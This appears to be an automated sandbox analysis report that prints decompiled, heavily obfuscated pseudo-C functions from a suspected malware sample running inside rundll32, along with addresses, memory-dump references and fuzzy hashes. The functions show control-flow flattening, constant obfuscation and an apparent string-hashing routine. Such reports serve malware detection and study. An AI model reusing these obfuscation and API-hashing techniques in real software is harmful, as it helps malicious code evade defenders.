				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E0068AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E0068AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E00687FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                      0x0068434d
                                                                                                                      0x00684351
                                                                                                                      0x00684353
                                                                                                                      0x00684357
                                                                                                                      0x00684358
                                                                                                                      0x00684359
                                                                                                                      0x0068435e
                                                                                                                      0x00684366
                                                                                                                      0x0068436b
                                                                                                                      0x0068436d
                                                                                                                      0x00684371
                                                                                                                      0x00684376
                                                                                                                      0x00684384
                                                                                                                      0x00684389
                                                                                                                      0x0068438f
                                                                                                                      0x00684397
                                                                                                                      0x0068439f
                                                                                                                      0x006843a4
                                                                                                                      0x006843ac
                                                                                                                      0x006843b8
                                                                                                                      0x006843bd
                                                                                                                      0x006843c3
                                                                                                                      0x006843c8
                                                                                                                      0x006843d0
                                                                                                                      0x006843d8
                                                                                                                      0x006843e5
                                                                                                                      0x006843e8
                                                                                                                      0x006843ec
                                                                                                                      0x006843f4
                                                                                                                      0x006843fc
                                                                                                                      0x0068440c
                                                                                                                      0x00684410
                                                                                                                      0x00684418
                                                                                                                      0x00684420
                                                                                                                      0x00684428
                                                                                                                      0x00684430
                                                                                                                      0x0068443c
                                                                                                                      0x00684441
                                                                                                                      0x00684447
                                                                                                                      0x0068444f
                                                                                                                      0x00684457
                                                                                                                      0x0068445f
                                                                                                                      0x00684467
                                                                                                                      0x0068446f
                                                                                                                      0x00684477
                                                                                                                      0x0068447f
                                                                                                                      0x00684487
                                                                                                                      0x0068448f
                                                                                                                      0x00684497
                                                                                                                      0x0068449f
                                                                                                                      0x006844a7
                                                                                                                      0x006844ac
                                                                                                                      0x006844b4
                                                                                                                      0x006844c0
                                                                                                                      0x006844c3
                                                                                                                      0x006844c7
                                                                                                                      0x006844cc
                                                                                                                      0x006844d9
                                                                                                                      0x006844e6
                                                                                                                      0x006844ee
                                                                                                                      0x006844f6
                                                                                                                      0x006844fe
                                                                                                                      0x0068450b
                                                                                                                      0x0068450f
                                                                                                                      0x00684517
                                                                                                                      0x0068451f
                                                                                                                      0x00684527
                                                                                                                      0x0068452f
                                                                                                                      0x00684534
                                                                                                                      0x0068453c
                                                                                                                      0x00684544
                                                                                                                      0x0068454c
                                                                                                                      0x00684554
                                                                                                                      0x0068455c
                                                                                                                      0x0068455c
                                                                                                                      0x00684566
                                                                                                                      0x006845bd
                                                                                                                      0x006845e3
                                                                                                                      0x006845e8
                                                                                                                      0x006845ed
                                                                                                                      0x006845ef
                                                                                                                      0x00000000
                                                                                                                      0x006845ef
                                                                                                                      0x00684568
                                                                                                                      0x0068456e
                                                                                                                      0x006845b9
                                                                                                                      0x00000000
                                                                                                                      0x00684570
                                                                                                                      0x00684576
                                                                                                                      0x00000000
                                                                                                                      0x0068457c
                                                                                                                      0x0068457c
                                                                                                                      0x006845a1
                                                                                                                      0x006845ad
                                                                                                                      0x006845ad
                                                                                                                      0x00684576
                                                                                                                      0x0068456e
                                                                                                                      0x006845b0
                                                                                                                      0x006845b8
                                                                                                                      0x006845b8
                                                                                                                      0x00684606
                                                                                                                      0x00684607
                                                                                                                      0x0068460d
                                                                                                                      0x00684613
                                                                                                                      0x0068461f
                                                                                                                      0x00000000
                                                                                                                      0x00684615
                                                                                                                      0x00684615
                                                                                                                      0x00000000
                                                                                                                      0x00684615
                                                                                                                      0x00000000
                                                                                                                      0x00684624
                                                                                                                      0x00684624
                                                                                                                      0x00000000

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                      • Instruction ID: 231c57cba5445bd46fb6744b54e210afbae2240b3c854342e5103f67dbb54027
                                                                                                                      • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                      • Instruction Fuzzy Hash: 657124B21093429FD358DF21C98942FBBF2EB95718F10891DF29556260D7B2C949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E0069894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E00683DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E00682A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E0069D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                      0x00698952
                                                                                                                      0x00698956
                                                                                                                      0x00698958
                                                                                                                      0x0069895a
                                                                                                                      0x0069895e
                                                                                                                      0x00698962
                                                                                                                      0x00698966
                                                                                                                      0x00698967
                                                                                                                      0x00698968
                                                                                                                      0x0069896d
                                                                                                                      0x00698975
                                                                                                                      0x0069897e
                                                                                                                      0x00698980
                                                                                                                      0x00698987
                                                                                                                      0x0069898c
                                                                                                                      0x00698992
                                                                                                                      0x00698997
                                                                                                                      0x0069899f
                                                                                                                      0x006989a7
                                                                                                                      0x006989af
                                                                                                                      0x006989b7
                                                                                                                      0x006989bf
                                                                                                                      0x006989c7
                                                                                                                      0x006989cc
                                                                                                                      0x006989d8
                                                                                                                      0x006989dd
                                                                                                                      0x006989e3
                                                                                                                      0x006989eb
                                                                                                                      0x006989f3
                                                                                                                      0x006989fb
                                                                                                                      0x00698a03
                                                                                                                      0x00698a10
                                                                                                                      0x00698a13
                                                                                                                      0x00698a17
                                                                                                                      0x00698a1f
                                                                                                                      0x00698a27
                                                                                                                      0x00698a34
                                                                                                                      0x00698a38
                                                                                                                      0x00698a3d
                                                                                                                      0x00698a45
                                                                                                                      0x00698a55
                                                                                                                      0x00698a59
                                                                                                                      0x00698a61
                                                                                                                      0x00698a69
                                                                                                                      0x00698a75
                                                                                                                      0x00698a7d
                                                                                                                      0x00698a81
                                                                                                                      0x00698a89
                                                                                                                      0x00698a91
                                                                                                                      0x00698a99
                                                                                                                      0x00698aa1
                                                                                                                      0x00698aa6
                                                                                                                      0x00698aae
                                                                                                                      0x00698aae
                                                                                                                      0x00698abc
                                                                                                                      0x00698b33
                                                                                                                      0x00698b38
                                                                                                                      0x00698b3b
                                                                                                                      0x00000000
                                                                                                                      0x00698abe
                                                                                                                      0x00698ac4
                                                                                                                      0x00698b0e
                                                                                                                      0x00698b13
                                                                                                                      0x00698b16
                                                                                                                      0x00698b18
                                                                                                                      0x00698b1a
                                                                                                                      0x00000000
                                                                                                                      0x00698b1a
                                                                                                                      0x00698ac6
                                                                                                                      0x00698ac6
                                                                                                                      0x00698acc
                                                                                                                      0x00000000
                                                                                                                      0x00698ace
                                                                                                                      0x00698ae2
                                                                                                                      0x00698aef
                                                                                                                      0x00698aef
                                                                                                                      0x00698acc
                                                                                                                      0x00698ac4
                                                                                                                      0x00698af3
                                                                                                                      0x00698afb
                                                                                                                      0x00698afb
                                                                                                                      0x00698b45
                                                                                                                      0x00698b47
                                                                                                                      0x00698b47
                                                                                                                      0x00698b47
                                                                                                                      0x00000000

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                      • Instruction ID: 924e226e606a0d5193df31a0bf7ca883a6014ac438c1664c4bfe8b47e3da6922
                                                                                                                      • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                      • Instruction Fuzzy Hash: E0517771108301AFCB94CF22C98681BBBE6FBD8748F50892DF59597660D772CA19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069AC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0069AC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E0068474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E0069C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                      0x0069ac3a
                                                                                                                      0x0069ac3a
                                                                                                                      0x0069ac3d
                                                                                                                      0x0069ac47
                                                                                                                      0x0069ac4f
                                                                                                                      0x0069ac5e
                                                                                                                      0x0069ac68
                                                                                                                      0x0069ac6c
                                                                                                                      0x0069ac6e
                                                                                                                      0x0069ac76
                                                                                                                      0x0069ac78
                                                                                                                      0x0069ac80
                                                                                                                      0x0069ac88
                                                                                                                      0x0069ac90
                                                                                                                      0x0069ac98
                                                                                                                      0x0069aca0
                                                                                                                      0x0069acab
                                                                                                                      0x0069acb8
                                                                                                                      0x0069acbc
                                                                                                                      0x0069acc4
                                                                                                                      0x0069accc
                                                                                                                      0x0069acd4
                                                                                                                      0x0069acdc
                                                                                                                      0x0069ace4
                                                                                                                      0x0069acec
                                                                                                                      0x0069acf4
                                                                                                                      0x0069acfe
                                                                                                                      0x0069ad02
                                                                                                                      0x0069ad0a
                                                                                                                      0x0069ad17
                                                                                                                      0x0069ad1b
                                                                                                                      0x0069ad20
                                                                                                                      0x0069ad28
                                                                                                                      0x0069ad35
                                                                                                                      0x0069ad39
                                                                                                                      0x0069ad3e
                                                                                                                      0x0069ad43
                                                                                                                      0x0069ad4b
                                                                                                                      0x0069ad4b
                                                                                                                      0x0069ad51
                                                                                                                      0x0069ad8a
                                                                                                                      0x0069ad8b
                                                                                                                      0x0069ad8c
                                                                                                                      0x0069ad91
                                                                                                                      0x0069ad94
                                                                                                                      0x0069ad96
                                                                                                                      0x00000000
                                                                                                                      0x0069ad53
                                                                                                                      0x0069ad55
                                                                                                                      0x00000000
                                                                                                                      0x0069ad57
                                                                                                                      0x0069ad72
                                                                                                                      0x0069ad72
                                                                                                                      0x0069ad55
                                                                                                                      0x0069ad74
                                                                                                                      0x0069ad7d
                                                                                                                      0x0069ad7d
                                                                                                                      0x0069ad9a
                                                                                                                      0x0069ad9c
                                                                                                                      0x0069ad9c
                                                                                                                      0x00000000

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                      • Instruction ID: f30aa20941f772a2b913a878155b00d89673dde0aea3b99e97ac386be9b4c2af
                                                                                                                      • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                      • Instruction Fuzzy Hash: 8C3153725083028FC318CF25D98944BFBE1FBD8798F108A1DF5A9A7221D375DA498B97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00688969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E00688969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E006920B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E0069D25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E00690AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E006880E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                      0x00688971
                                                                                                                      0x00688974
                                                                                                                      0x00688976
                                                                                                                      0x00688979
                                                                                                                      0x0068897b
                                                                                                                      0x00688980
                                                                                                                      0x00688986
                                                                                                                      0x0068898a
                                                                                                                      0x00688991
                                                                                                                      0x00688998
                                                                                                                      0x006889a5
                                                                                                                      0x006889a6
                                                                                                                      0x006889a9
                                                                                                                      0x006889b0
                                                                                                                      0x006889b7
                                                                                                                      0x006889be
                                                                                                                      0x006889c5
                                                                                                                      0x006889cc
                                                                                                                      0x006889d7
                                                                                                                      0x006889da
                                                                                                                      0x006889e1
                                                                                                                      0x006889ed
                                                                                                                      0x006889f0
                                                                                                                      0x006889f7
                                                                                                                      0x00688a02
                                                                                                                      0x00688a05
                                                                                                                      0x00688a0c
                                                                                                                      0x00688a0f
                                                                                                                      0x00688a16
                                                                                                                      0x00688a21
                                                                                                                      0x00688a28
                                                                                                                      0x00688a2b
                                                                                                                      0x00688a32
                                                                                                                      0x00688a39
                                                                                                                      0x00688a40
                                                                                                                      0x00688a44
                                                                                                                      0x00688a4b
                                                                                                                      0x00688a58
                                                                                                                      0x00688a5d
                                                                                                                      0x00688a64
                                                                                                                      0x00688a6b
                                                                                                                      0x00688a72
                                                                                                                      0x00688a79
                                                                                                                      0x00688a7d
                                                                                                                      0x00688a84
                                                                                                                      0x00688a97
                                                                                                                      0x00688a9c
                                                                                                                      0x00688aa2
                                                                                                                      0x00688aa7
                                                                                                                      0x00688aa8
                                                                                                                      0x00688aa9
                                                                                                                      0x00688aab
                                                                                                                      0x00688ab5
                                                                                                                      0x00688abe

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                      • Instruction ID: 568f9e868213b2ff3465a4fe6b51f87b4a41b72dabc2e6ce87a1c53b059eb340
                                                                                                                      • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                      • Instruction Fuzzy Hash: 1241DD71C0121AEBCF18CFE5C98A9EEBFB5FB44314F108199D525AA260D3B95B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069DBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006920B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                      0x0069dbf1
                                                                                                                      0x0069dbf4
                                                                                                                      0x0069dbf6
                                                                                                                      0x0069dbf9
                                                                                                                      0x0069dbfc
                                                                                                                      0x0069dbfe
                                                                                                                      0x0069dc03
                                                                                                                      0x0069dc0a
                                                                                                                      0x0069dc10
                                                                                                                      0x0069dc17
                                                                                                                      0x0069dc1e
                                                                                                                      0x0069dc25
                                                                                                                      0x0069dc2c
                                                                                                                      0x0069dc33
                                                                                                                      0x0069dc3a
                                                                                                                      0x0069dc46
                                                                                                                      0x0069dc49
                                                                                                                      0x0069dc4c
                                                                                                                      0x0069dc50
                                                                                                                      0x0069dc57
                                                                                                                      0x0069dc5e
                                                                                                                      0x0069dc65
                                                                                                                      0x0069dc69
                                                                                                                      0x0069dc70
                                                                                                                      0x0069dc74
                                                                                                                      0x0069dc7e
                                                                                                                      0x0069dc82
                                                                                                                      0x0069dc87
                                                                                                                      0x0069dc95
                                                                                                                      0x0069dc98
                                                                                                                      0x0069dc9c
                                                                                                                      0x0069dca3
                                                                                                                      0x0069dcb0
                                                                                                                      0x0069dcb7
                                                                                                                      0x0069dcbb
                                                                                                                      0x0069dcc2
                                                                                                                      0x0069dcc6
                                                                                                                      0x0069dcd8
                                                                                                                      0x0069dcdb
                                                                                                                      0x0069dce0
                                                                                                                      0x0069dce3
                                                                                                                      0x0069dce6
                                                                                                                      0x0069dce7
                                                                                                                      0x0069dce8
                                                                                                                      0x0069dcee
                                                                                                                      0x0069dcf6

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
